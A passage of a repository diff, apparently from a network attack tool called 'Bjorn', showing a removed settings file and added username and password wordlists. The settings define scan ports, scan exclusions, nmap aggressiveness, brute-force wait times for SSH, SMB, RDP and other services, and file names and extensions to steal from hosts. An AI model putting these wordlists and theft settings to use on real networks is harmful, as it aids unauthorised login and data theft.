str or None: A new comment, or None if not time yet and status unchanged.
"""
current_time = time.time()
status = status or "IDLE"
status_changed = (status != self.last_status)
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
text = self._pick_text(status, lang, params)
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
return text
return None
# Backward compatibility alias
Commentaireia = CommentAI

View File

View File

@@ -1,107 +0,0 @@
{
"__title_Bjorn__": "Settings",
"manual_mode": false,
"websrv": true,
"web_increment ": false,
"debug_mode": true,
"scan_vuln_running": false,
"retry_success_actions": false,
"retry_failed_actions": true,
"blacklistcheck": true,
"displaying_csv": true,
"log_debug": true,
"log_info": true,
"log_warning": true,
"log_error": true,
"log_critical": true,
"startup_delay": 10,
"web_delay": 2,
"screen_delay": 1,
"comment_delaymin": 15,
"comment_delaymax": 30,
"livestatus_delay": 8,
"image_display_delaymin": 2,
"image_display_delaymax": 8,
"scan_interval": 180,
"scan_vuln_interval": 900,
"failed_retry_delay": 600,
"success_retry_delay": 900,
"ref_width": 122,
"ref_height": 250,
"epd_type": "epd2in13_V4",
"__title_lists__": "List Settings",
"portlist": [
20,
21,
22,
23,
25,
53,
69,
80,
110,
111,
135,
137,
139,
143,
161,
162,
389,
443,
445,
512,
513,
514,
587,
636,
993,
995,
1080,
1433,
1521,
2049,
3306,
3389,
5000,
5001,
5432,
5900,
8080,
8443,
9090,
10000
],
"mac_scan_blacklist": [
"00:11:32:c4:71:9b",
"00:11:32:c4:71:9a"
],
"ip_scan_blacklist": [
"192.168.1.1",
"192.168.1.12",
"192.168.1.38",
"192.168.1.53",
"192.168.1.40",
"192.168.1.29"
],
"steal_file_names": [
"ssh.csv",
"hack.txt"
],
"steal_file_extensions": [
".bjorn",
".hack",
".flag"
],
"__title_network__": "Network",
"nmap_scan_aggressivity": "-T2",
"portstart": 1,
"portend": 2,
"__title_timewaits__": "Time Wait Settings",
"timewait_smb": 0,
"timewait_ssh": 0,
"timewait_telnet": 0,
"timewait_ftp": 0,
"timewait_sql": 0,
"timewait_rdp": 0
}

View File

@@ -1,3 +1,16 @@
root
admin
bjorn
MqUG09FmPb
OD1THT4mKMnlt2M$
letmein
QZKOJDBEJf
ZrXqzIlZk3
9XP5jT3gwJjmvULK
password
9Pbc8RjB5s
fcQRQUxnZl
Jzp0G7kolyloIk7g
DyMuqqfGYj
G8tCoDFNIM
8gv1j!vubL20xCH$
i5z1nlF3Uf
zkg3ojoCoKAHaPo%
oWcK1Zmkve

View File

@@ -1,3 +1,8 @@
manager
root
admin
bjorn
db_audit
dev
user
boss
deploy

Some files were not shown because too many files have changed in this diff Show More